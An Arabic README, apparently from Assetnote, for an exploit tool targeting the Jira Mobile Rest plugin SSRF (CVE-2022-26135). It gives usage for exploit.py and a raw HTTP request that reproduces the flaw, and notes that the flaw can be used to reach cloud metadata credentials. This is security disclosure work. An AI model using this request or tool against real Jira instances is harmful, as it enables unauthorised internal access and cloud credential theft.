
كود استغلال لـ Jira Mobile Rest Plugin SSRF (CVE-2022-26135)
تقوم Assetnote تلقائيًا بتعيين أصولك الخارجية ومراقبتها بحثًا عن التغييرات والمشكلات الأمنية للمساعدة في منع الاختراقات الخطيرة.
تم إجراء هذا البحث بواسطة فريق أبحاث الأمن في Assetnote.
يمكنك قراءة المزيد عن منتجنا وفريقنا على https://assetnote.io.
يمكنك العثور على منشور المدونة الذي يوضح الخطوات المتبعة لاكتشاف هذه الثغرة هنا.
Jira Core و Jira Service Desk معرضتان لـ server-side request forgery بعد المصادقة. في بعض الحالات، من الممكن الاستفادة من التسجيلات المفتوحة في Jira Core أو Jira Service Desk لاستغلال هذه الثغرة دون وجود بيانات اعتماد معروفة.
تسمح ثغرة SSRF للمهاجمين بإرسال طلبات HTTP باستخدام أي طريقة HTTP ورؤوس وجسم إلى عناوين URL عشوائية. عندما يتم نشر Jira في بيئة سحابية، يمكن للمهاجم الاستفادة من سلسلة الاستغلال هذه للحصول على بيانات اعتماد السحابة أو معلومات حساسة أخرى من خلال عنوان IP للبيانات الوصفية.
وفقًا للإرشاد الصادر من Atlassian، يُرجى مراجعة مقال قاعدة المعرفة التالي لتأكيد ما إذا كنت تستخدم إصدارًا برمجيًا متأثرًا: https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html
pip3 install -r requirements.txt
ثم يمكنك استخدام الأداة باستخدام:
python3 exploit.py
المساعدة:
usage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]
optional arguments:
-h, --help show this help message and exit
--target TARGET i.e. http://re.local:8090
--ssrf SSRF i.e. example.com (no protocol pls)
--mode MODE i.e. manual or automatic - manual mode you need to provide user auth info
--software SOFTWARE i.e. jira or jsd - only needed for manual mode
--username USERNAME i.e. admin - only needed for manual jira mode
--email EMAIL i.e. [email protected] - only needed for manual jira service desk mode
--password PASSWORD i.e. testing123 - only needed for manual mode
إذا كان لديك بالفعل بيانات اعتماد لـ Jira / Jira Service Desk، فاضبط --mode على manual والوسيطة --software إما على jira أو jsd.
يمكن استخدام طلب HTTP التالي لإعادة إنتاج هذه المشكلة، بعد المصادقة على مثيل Jira:
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63
{"requests":[{"method":"GET","location":"@example.com"}]}